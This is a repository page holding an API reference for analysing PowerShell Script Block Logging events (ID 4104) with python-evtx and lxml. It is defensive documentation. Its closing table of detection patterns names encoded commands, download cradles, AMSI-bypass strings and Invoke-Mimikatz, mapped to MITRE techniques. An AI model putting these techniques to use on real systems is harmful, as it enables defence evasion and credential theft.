creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-10 21:24:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
main
Anthropic-Cybersecurity-Skills/skills/analyzing-powershell-script-block-logging/references/api-reference.md
T
mukul975 27c6414ca5 Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills 
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
2026-03-10 21:02:12 +01:00

1.8 KiB
Raw Permalink Blame History

API Reference: PowerShell Script Block Logging Analysis

python-evtx Library

FileHeader

from Evtx.Evtx import FileHeader
with open(evtx_path, "rb") as f:
    fh = FileHeader(f)
    for record in fh.records():
        xml_string = record.xml()  # Returns XML string of the event

Event XML Structure (Event ID 4104)

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <EventID>4104</EventID>
    <TimeCreated SystemTime="2024-01-15T10:30:00.000Z"/>
  </System>
  <EventData>
    <Data Name="MessageNumber">1</Data>
    <Data Name="MessageTotal">3</Data>
    <Data Name="ScriptBlockText">...powershell code...</Data>
    <Data Name="ScriptBlockId">guid-string</Data>
    <Data Name="Path">C:\script.ps1</Data>
  </EventData>
</Event>

lxml etree Parsing

from lxml import etree
NS = {"evt": "http://schemas.microsoft.com/win/2004/08/events/event"}
root = etree.fromstring(xml_bytes)
event_id = root.find(".//evt:System/evt:EventID", NS).text
data_elems = root.findall(".//evt:EventData/evt:Data", NS)
for elem in data_elems:
    name = elem.get("Name")
    value = elem.text

Script Block Reconstruction

Large PowerShell scripts are split across multiple Event 4104 entries:

  • ScriptBlockId: Unique GUID shared across all parts
  • MessageNumber: Part index (1-based)
  • MessageTotal: Total number of parts
  • Reconstruct: concatenate parts ordered by MessageNumber

Key Detection Patterns

Pattern MITRE Risk
-EncodedCommand T1059.001 High
FromBase64String T1140 High
Invoke-Expression / iex T1059.001 High
DownloadString / Net.WebClient T1105 Critical
AmsiUtils / amsiInitFailed T1562.001 Critical
Invoke-Mimikatz T1003 Critical
High entropy (>5.5) T1027 Medium
Reference in New Issue View Git Blame Copy Permalink